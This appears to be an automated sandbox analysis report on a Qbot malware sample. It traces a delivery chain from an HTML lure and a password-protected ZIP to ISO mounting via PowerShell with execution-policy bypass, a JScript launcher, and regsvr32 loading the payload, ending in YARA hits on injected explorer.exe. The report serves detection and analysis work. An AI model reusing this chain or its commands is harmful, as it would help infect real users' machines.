                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          1192.168.2.649727142.250.180.174443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2022-09-16 17:14:31 UTC0OUTGET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=104.0.5112.81&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1
                                                                                                          Host: clients2.google.com
                                                                                                          Connection: keep-alive
                                                                                                          X-Goog-Update-Interactivity: fg
                                                                                                          X-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmieda
                                                                                                          X-Goog-Update-Updater: chromecrx-104.0.5112.81
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2022-09-16 17:14:31 UTC1INHTTP/1.1 200 OK
                                                                                                          Content-Security-Policy: script-src 'report-sample' 'nonce-OTwm9hxERiObraHVGL5AhQ' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/clientupdate-aus/1
                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                          Pragma: no-cache
                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                          Date: Fri, 16 Sep 2022 17:14:31 GMT
                                                                                                          Content-Type: text/xml; charset=UTF-8
                                                                                                          X-Daynum: 5737
                                                                                                          X-Daystart: 36871
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                          Server: GSE
                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                          Accept-Ranges: none
                                                                                                          Vary: Accept-Encoding
                                                                                                          Connection: close
                                                                                                          Transfer-Encoding: chunked
                                                                                                          2022-09-16 17:14:31 UTC2INData Raw: 32 63 39 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 67 75 70 64 61 74 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 75 70 64 61 74 65 32 2f 72 65 73 70 6f 6e 73 65 22 20 70 72 6f 74 6f 63 6f 6c 3d 22 32 2e 30 22 20 73 65 72 76 65 72 3d 22 70 72 6f 64 22 3e 3c 64 61 79 73 74 61 72 74 20 65 6c 61 70 73 65 64 5f 64 61 79 73 3d 22 35 37 33 37 22 20 65 6c 61 70 73 65 64 5f 73 65 63 6f 6e 64 73 3d 22 33 36 38 37 31 22 2f 3e 3c 61 70 70 20 61 70 70 69 64 3d 22 6e 6d 6d 68 6b 6b 65 67 63 63 61 67 64 6c 64 67 69 69 6d 65 64 70 69 63 63 6d 67 6d 69 65 64 61 22 20 63 6f 68 6f 72 74 3d 22 31 3a 3a 22 20 63 6f 68 6f 72 74 6e 61 6d 65 3d 22 22
                                                                                                          Data Ascii: 2c9<?xml version="1.0" encoding="UTF-8"?><gupdate xmlns="http://www.google.com/update2/response" protocol="2.0" server="prod"><daystart elapsed_days="5737" elapsed_seconds="36871"/><app appid="nmmhkkegccagdldgiimedpiccmgmieda" cohort="1::" cohortname=""
                                                                                                          2022-09-16 17:14:31 UTC2INData Raw: 6d 68 6b 6b 65 67 63 63 61 67 64 6c 64 67 69 69 6d 65 64 70 69 63 63 6d 67 6d 69 65 64 61 2e 63 72 78 22 20 66 70 3d 22 31 2e 38 31 65 33 61 34 64 34 33 61 37 33 36 39 39 65 31 62 37 37 38 31 37 32 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 68 61 73 68 5f 73 68 61 32 35 36 3d 22 38 31 65 33 61 34 64 34 33 61 37 33 36 39 39 65 31 62 37 37 38 31 37 32 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 70 72 6f 74 65 63 74 65 64 3d 22 30 22 20 73 69 7a 65 3d 22 32 34 38 35 33 31 22 20 73 74 61 74 75 73 3d 22 6f 6b 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 2e 30 2e 36 22 2f 3e 3c 2f 61 70 70 3e 3c 2f 67
                                                                                                          Data Ascii: mhkkegccagdldgiimedpiccmgmieda.crx" fp="1.81e3a4d43a73699e1b7781723f56b8717175c536685c5450122b30789464ad82" hash_sha256="81e3a4d43a73699e1b7781723f56b8717175c536685c5450122b30789464ad82" protected="0" size="248531" status="ok" version="1.0.0.6"/></app></g
                                                                                                          2022-09-16 17:14:31 UTC2INData Raw: 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 0


                                                                                                          Statistics

                                                                                                          CPU Usage

                                                                                                          Click to jump to process

                                                                                                          Memory Usage

                                                                                                          Click to jump to process

                                                                                                          High Level Behavior Distribution

                                                                                                          Click to dive into process behavior distribution

                                                                                                          Behavior

                                                                                                          Click to jump to process

                                                                                                          System Behavior

                                                                                                          General

                                                                                                          Target ID:2
                                                                                                          Start time:19:14:26
                                                                                                          Start date:16/09/2022
                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank
                                                                                                          Imagebase:0x7ff6f9750000
                                                                                                          File size:2851656 bytes
                                                                                                          MD5 hash:0FEC2748F363150DC54C1CAFFB1A9408
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high

                                                                                                          General

                                                                                                          Target ID:5
                                                                                                          Start time:19:14:28
                                                                                                          Start date:16/09/2022
                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1960 --field-trial-handle=1800,i,15047504098167429117,11276190225124185928,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8
                                                                                                          Imagebase:0x7ff6f9750000
                                                                                                          File size:2851656 bytes
                                                                                                          MD5 hash:0FEC2748F363150DC54C1CAFFB1A9408
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high

                                                                                                          General

                                                                                                          Target ID:7
                                                                                                          Start time:19:14:29
                                                                                                          Start date:16/09/2022
                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\Calculation#8785(Sep16).html
                                                                                                          Imagebase:0x7ff6f9750000
                                                                                                          File size:2851656 bytes
                                                                                                          MD5 hash:0FEC2748F363150DC54C1CAFFB1A9408
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high

                                                                                                          General

                                                                                                          Target ID:9
                                                                                                          Start time:19:14:35
                                                                                                          Start date:16/09/2022
                                                                                                          Path:C:\Windows\SysWOW64\unarchiver.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user\Downloads\Calculation#8785(Sep16).zip
                                                                                                          Imagebase:0x730000
                                                                                                          File size:13312 bytes
                                                                                                          MD5 hash:9DE2E060A2985A232D8B96F9EC847A19
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:.Net C# or VB.NET
                                                                                                          Reputation:moderate

                                                                                                          General

                                                                                                          Target ID:10
                                                                                                          Start time:19:14:38
                                                                                                          Start date:16/09/2022
                                                                                                          Path:C:\Windows\SysWOW64\7za.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:C:\Windows\System32\7za.exe" x -pabc444 -y -o"C:\Users\user\AppData\Local\Temp\idbrycd1.fis" "C:\Users\user\Downloads\Calculation#8785(Sep16).zip
                                                                                                          Imagebase:0x1210000
                                                                                                          File size:289792 bytes
                                                                                                          MD5 hash:77E556CDFDC5C592F5C46DB4127C6F4C
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high

                                                                                                          General

                                                                                                          Target ID:11
                                                                                                          Start time:19:14:44
                                                                                                          Start date:16/09/2022
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff6da640000
                                                                                                          File size:625664 bytes
                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high

                                                                                                          General

                                                                                                          Target ID:13
                                                                                                          Start time:19:15:02
                                                                                                          Start date:16/09/2022
                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:cmd.exe" /c powershell.exe -ex bypass -command Mount-DiskImage -ImagePath "C:\Users\user\AppData\Local\Temp\idbrycd1.fis\Calculation#8785.iso
                                                                                                          Imagebase:0x1b0000
                                                                                                          File size:232960 bytes
                                                                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high

                                                                                                          General

                                                                                                          Target ID:14
                                                                                                          Start time:19:15:02
                                                                                                          Start date:16/09/2022
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff6da640000
                                                                                                          File size:625664 bytes
                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high

                                                                                                          General

                                                                                                          Target ID:15
                                                                                                          Start time:19:15:03
                                                                                                          Start date:16/09/2022
                                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:powershell.exe -ex bypass -command Mount-DiskImage -ImagePath "C:\Users\user\AppData\Local\Temp\idbrycd1.fis\Calculation#8785.iso"
                                                                                                          Imagebase:0x160000
                                                                                                          File size:430592 bytes
                                                                                                          MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:.Net C# or VB.NET
                                                                                                          Reputation:high

                                                                                                          General

                                                                                                          Target ID:23
                                                                                                          Start time:19:15:31
                                                                                                          Start date:16/09/2022
                                                                                                          Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Windows\System32\WScript.exe" "E:\more\seeSay.js"
                                                                                                          Imagebase:0xb80000
                                                                                                          File size:147456 bytes
                                                                                                          MD5 hash:7075DD7B9BE8807FCA93ACD86F724884
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language

                                                                                                          General

                                                                                                          Target ID:25
                                                                                                          Start time:19:15:35
                                                                                                          Start date:16/09/2022
                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c ""E:\more\myTheir.bat" r egs v"
                                                                                                          Imagebase:0x1b0000
                                                                                                          File size:232960 bytes
                                                                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language

                                                                                                          General

                                                                                                          Target ID:26
                                                                                                          Start time:19:15:36
                                                                                                          Start date:16/09/2022
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff6da640000
                                                                                                          File size:625664 bytes
                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language

                                                                                                          General

                                                                                                          Target ID:27
                                                                                                          Start time:19:15:37
                                                                                                          Start date:16/09/2022
                                                                                                          Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:regsvr32 more/veryAs.db
                                                                                                          Imagebase:0x1080000
                                                                                                          File size:20992 bytes
                                                                                                          MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 0000001B.00000003.499883597.0000000004BF4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 0000001B.00000003.499883597.0000000004BF4000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                          • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 0000001B.00000003.499883597.0000000004BF4000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 0000001B.00000002.511786081.00000000031B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 0000001B.00000002.511786081.00000000031B0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                          • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 0000001B.00000002.511786081.00000000031B0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown

                                                                                                          General

                                                                                                          Target ID:29
                                                                                                          Start time:19:16:09
                                                                                                          Start date:16/09/2022
                                                                                                          Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                          Imagebase:0x880000
                                                                                                          File size:3611360 bytes
                                                                                                          MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 0000001D.00000002.721903989.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 0000001D.00000002.721903989.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                          • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 0000001D.00000002.721903989.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 0000001D.00000000.511078264.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 0000001D.00000000.511078264.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                          • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 0000001D.00000000.511078264.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown

                                                                                                          Disassembly

                                                                                                          Reset < >

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:23.3%
                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                            Signature Coverage:5.5%
                                                                                                            Total number of Nodes:73
                                                                                                            Total number of Limit Nodes:4
                                                                                                            execution_graph 1468 cfb04f 1469 cfb076 FindClose 1468->1469 1471 cfb0b7 1469->1471 1391 cfa78e 1392 cfa7c3 SetFilePointer 1391->1392 1394 cfa7f2 1392->1394 1405 cfa50a 1406 cfa542 CreateFileW 1405->1406 1408 cfa591 1406->1408 1440 cfadc8 1441 cfadee DuplicateHandle 1440->1441 1443 cfae73 1441->1443 1472 cfa75c 1473 cfa78e SetFilePointer 1472->1473 1475 cfa7f2 1473->1475 1460 cfa69b 1461 cfa6ce GetFileType 1460->1461 1463 cfa730 1461->1463 1413 cfa2da 1414 cfa32f 1413->1414 1415 cfa306 SetErrorMode 1413->1415 1414->1415 1416 cfa31b 1415->1416 1417 cfb29a 1418 cfb2fc 1417->1418 1419 cfb2c6 GetSystemInfo 1417->1419 1418->1419 1420 cfb2d4 1419->1420 1484 cfa917 1486 cfa952 CreateDirectoryW 1484->1486 1487 cfa99f 1486->1487 1429 cfa952 1430 cfa978 CreateDirectoryW 1429->1430 1432 cfa99f 1430->1432 1395 cfa86e 1397 cfa8a3 ReadFile 1395->1397 1398 cfa8d5 1397->1398 1464 cfa2ae 1467 cfa2b2 SetErrorMode 1464->1467 1466 cfa31b 1467->1466 1444 cfa9ec 1445 cfaa12 RegQueryValueExW 1444->1445 1447 cfaa9b 1445->1447 1402 cfacaa 1403 cfacfa CreatePipe 1402->1403 1404 cfad02 1403->1404 1448 cfa4e8 1451 cfa50a CreateFileW 1448->1451 1450 cfa591 1451->1450 1409 cfa622 1410 cfa64e FindCloseChangeNotification 1409->1410 1412 cfa68d 1409->1412 1411 cfa65c 1410->1411 1412->1410 1456 cfa5e0 1457 cfa5ee FindCloseChangeNotification 1456->1457 1459 cfa65c 1457->1459 1488 cfa120 1489 cfa172 FindNextFileW 1488->1489 1491 cfa1ca 1489->1491 1492 cfa83f 1493 cfa86e ReadFile 1492->1493 1495 cfa8d5 1493->1495 1496 cfac3a 1497 cfac6a CreatePipe 1496->1497 1499 cfad02 1497->1499 1476 cfb278 1477 cfb29a GetSystemInfo 1476->1477 1479 cfb2d4 1477->1479 1425 cfb076 1426 cfb0d4 1425->1426 1427 cfb0a2 FindClose 1425->1427 1426->1427 1428 cfb0b7 1427->1428 1433 cfa172 1434 cfa1c2 FindNextFileW 1433->1434 1435 cfa1ca 1434->1435

                                                                                                            Executed Functions

                                                                                                            Function 04EE02C8 Relevance: 5.9, Strings: 4, Instructions: 892COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 0 4ee02c8-4ee02f9 1 4ee02fb 0->1 2 4ee0300-4ee03bf 0->2 1->2 7 4ee03c6-4ee03ea 2->7 8 4ee03c1 2->8 10 4ee0b26-4ee0b46 7->10 11 4ee03f0-4ee0411 7->11 8->7 14 4ee0b4c-4ee0b5d 10->14 15 4ee11a8-4ee11ba 10->15 16 4ee0417-4ee062f 11->16 17 4ee0631-4ee063f 11->17 18 4ee0b5f 14->18 19 4ee0b64-4ee0b72 14->19 23 4ee1218-4ee1221 15->23 24 4ee0640-4ee064a 16->24 17->24 18->19 217 4ee0b78 call 4ee12e8 19->217 218 4ee0b78 call 4ee12f8 19->218 27 4ee064c-4ee0656 24->27 28 4ee0681 24->28 29 4ee065d-4ee067f 27->29 30 4ee0658 27->30 32 4ee068b-4ee06ab 28->32 29->32 30->29 31 4ee0b7e-4ee0bab call 4ee13a8 215 4ee0bae call 4ee12e8 31->215 216 4ee0bae call 4ee12f8 31->216 35 4ee06ad 32->35 36 4ee06b2-4ee06ee 32->36 35->36 45 4ee071f-4ee0721 36->45 46 4ee06f0-4ee071d 36->46 43 4ee0bb4-4ee0bd5 50 4ee0bff 43->50 51 4ee0bd7-4ee0be3 43->51 49 4ee0727-4ee075e 45->49 46->49 61 4ee0788 49->61 62 4ee0760-4ee076c 49->62 57 4ee0c05-4ee0c2a 50->57 55 4ee0bed-4ee0bf3 51->55 56 4ee0be5-4ee0beb 51->56 58 4ee0bfd 55->58 56->58 67 4ee0d04-4ee0d1c 57->67 68 4ee0c30-4ee0ca7 57->68 58->57 66 4ee078e-4ee07d7 61->66 64 4ee076e-4ee0774 62->64 65 4ee0776-4ee077c 62->65 70 4ee0786 64->70 65->70 83 4ee07dd-4ee0860 66->83 84 4ee0ab3-4ee11ba 66->84 223 4ee0d22 call 4ee12e8 67->223 224 4ee0d22 call 4ee12f8 67->224 90 4ee0cae-4ee0cff 68->90 91 4ee0ca9 68->91 70->66 77 4ee0d28-4ee0dcb 108 4ee0dcd 77->108 109 4ee0dd2-4ee0e1a call 4ee1419 77->109 106 4ee0a7f-4ee0a98 83->106 84->23 113 4ee0e22 90->113 91->90 110 4ee0a9e-4ee0ab2 106->110 111 4ee0865-4ee0871 106->111 108->109 129 4ee0e20-4ee0e21 109->129 110->84 115 4ee0878-4ee08ba 111->115 116 4ee0873 111->116 212 4ee0e28 call 4ee12e8 113->212 213 4ee0e28 call 4ee12f8 113->213 126 4ee0a0b-4ee0a2b 115->126 116->115 121 4ee0e2e-4ee0e9f 210 4ee0ea5 call 4ee12e8 121->210 211 4ee0ea5 call 4ee12f8 121->211 130 4ee08bf-4ee08d8 126->130 131 4ee0a31-4ee0a6b 126->131 129->113 136 4ee08da-4ee08e6 130->136 137 4ee0902 130->137 141 4ee0a6d-4ee0a76 131->141 142 4ee0a77 131->142 135 4ee0eab-4ee0ee2 146 4ee1154-4ee116d 135->146 139 4ee08e8-4ee08ee 136->139 140 4ee08f0-4ee08f6 136->140 143 4ee0908-4ee0941 137->143 145 4ee0900 139->145 140->145 141->142 142->106 160 4ee0a0a 143->160 161 4ee0947-4ee0a09 143->161 145->143 149 4ee0ee7-4ee0ef3 146->149 150 4ee1173-4ee1184 146->150 151 4ee0efa-4ee0f16 149->151 152 4ee0ef5 149->152 153 4ee1186-4ee11a3 150->153 154 4ee11a4-4ee11a6 150->154 156 4ee0f1c-4ee0f55 151->156 157 4ee1140-4ee1146 151->157 152->151 153->154 169 4ee0f5b 156->169 170 4ee0f57-4ee0f59 156->170 158 4ee114d-4ee1151 157->158 159 4ee1148 157->159 158->146 159->158 160->126 161->160 171 4ee0f60-4ee0f67 169->171 170->171 173 4ee0f6d-4ee0f82 171->173 174 4ee1119-4ee113e 171->174 175 4ee0ff9-4ee100f 173->175 184 4ee113f 174->184 177 4ee0f84-4ee0f8d 175->177 178 4ee1015-4ee1026 175->178 182 4ee0f8f 177->182 183 4ee0f94-4ee0fea 177->183 180 4ee102c-4ee1044 178->180 181 4ee1115-4ee1117 178->181 219 4ee104a call 4ee12e8 180->219 220 4ee104a call 4ee12f8 180->220 181->184 182->183 195 4ee0fec-4ee0ff4 183->195 196 4ee0ff5-4ee0ff6 183->196 184->157 190 4ee1050-4ee107e 198 4ee10c2-4ee10c4 190->198 199 4ee1080-4ee10c0 190->199 195->196 196->175 200 4ee10ca-4ee10d9 198->200 199->200 202 4ee10ed-4ee1103 200->202 203 4ee10db-4ee10e2 call 4ee172f 200->203 207 4ee1104-4ee110a 202->207 205 4ee10e8-4ee10eb 203->205 205->207 208 4ee110c 207->208 209 4ee1111-4ee1114 207->209 208->209 209->181 210->135 211->135 212->121 213->121 215->43 216->43 217->31 218->31 219->190 220->190 223->77 224->77
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.441462231.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_4ee0000_unarchiver.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: :@-r$:@-r$:@-r$X1Tr
                                                                                                            • API String ID: 0-3920755545
                                                                                                            • Opcode ID: 0c074346b0bc790e5a4d48b19802484c30321b0b27fb5d939adfd0d014707de2
                                                                                                            • Instruction ID: e8f9f19ffe506436e286db66549c017e4e342a248d143ded5053f34e6344989e
                                                                                                            • Opcode Fuzzy Hash: 0c074346b0bc790e5a4d48b19802484c30321b0b27fb5d939adfd0d014707de2
                                                                                                            • Instruction Fuzzy Hash: 8D921374A01228CFDB24DF66C944BEDBBB2BF89301F1095A9D409AB354DB70AE85DF10
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00CFB29A Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetSystemInfo.KERNELBASE(?), ref: 00CFB2CC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.440822275.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_cfa000_unarchiver.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InfoSystem
                                                                                                            • String ID:
                                                                                                            • API String ID: 31276548-0
                                                                                                            • Opcode ID: b60f94ac073c718f49842efea0b8a6f2c156a6b53c318ebad2dcd0b8e718842d
                                                                                                            • Instruction ID: 597549be9c8a9de88afb0911daf958451b9aca64b3d7dfcb166ee5174312ebff
                                                                                                            • Opcode Fuzzy Hash: b60f94ac073c718f49842efea0b8a6f2c156a6b53c318ebad2dcd0b8e718842d
                                                                                                            • Instruction Fuzzy Hash: 8A01D1709043489FDB51CF1AD884769FBA4EF44320F18C0AADE488F752D374E908CBA2
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 04EE172F Relevance: .2, Instructions: 171COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.441462231.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_4ee0000_unarchiver.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 8889231ce467a4dca9229bf59a4511edf76a17778e0410d7c2466eb5668230db
                                                                                                            • Instruction ID: 9f3be8f63eb637e22f00e12e2008898ea5e5e9e820e2cb953e38794e6a79c17c
                                                                                                            • Opcode Fuzzy Hash: 8889231ce467a4dca9229bf59a4511edf76a17778e0410d7c2466eb5668230db
                                                                                                            • Instruction Fuzzy Hash: 6351F871E42208DFDB08EFB5D580AEEBBB2EF8A300F205429D406B7354DB359986DB55
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00CFB30A Relevance: 1.6, APIs: 1, Instructions: 101COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 225 cfb30a-cfb3af 230 cfb407-cfb40c 225->230 231 cfb3b1-cfb3b9 DuplicateHandle 225->231 230->231 233 cfb3bf-cfb3d1 231->233 234 cfb40e-cfb413 233->234 235 cfb3d3-cfb404 233->235 234->235
                                                                                                            APIs
                                                                                                            • DuplicateHandle.KERNELBASE(?,00000E2C), ref: 00CFB3B7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.440822275.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_cfa000_unarchiver.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DuplicateHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 3793708945-0
                                                                                                            • Opcode ID: 209a6d001af1a9939916cfe6c733d409b9243e5f522cdcf7e54bf1a942d94198
                                                                                                            • Instruction ID: dbd74ac851b7c6b8af94369c3993e5545fb5a1d7c169737a768cff58edd175da
                                                                                                            • Opcode Fuzzy Hash: 209a6d001af1a9939916cfe6c733d409b9243e5f522cdcf7e54bf1a942d94198
                                                                                                            • Instruction Fuzzy Hash: 0431B271404384AFEB228B65DC45FA6BFBCEF05310F04859AF985CB592D234A919CB71
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00CFADC8 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                            Download Yara Rule

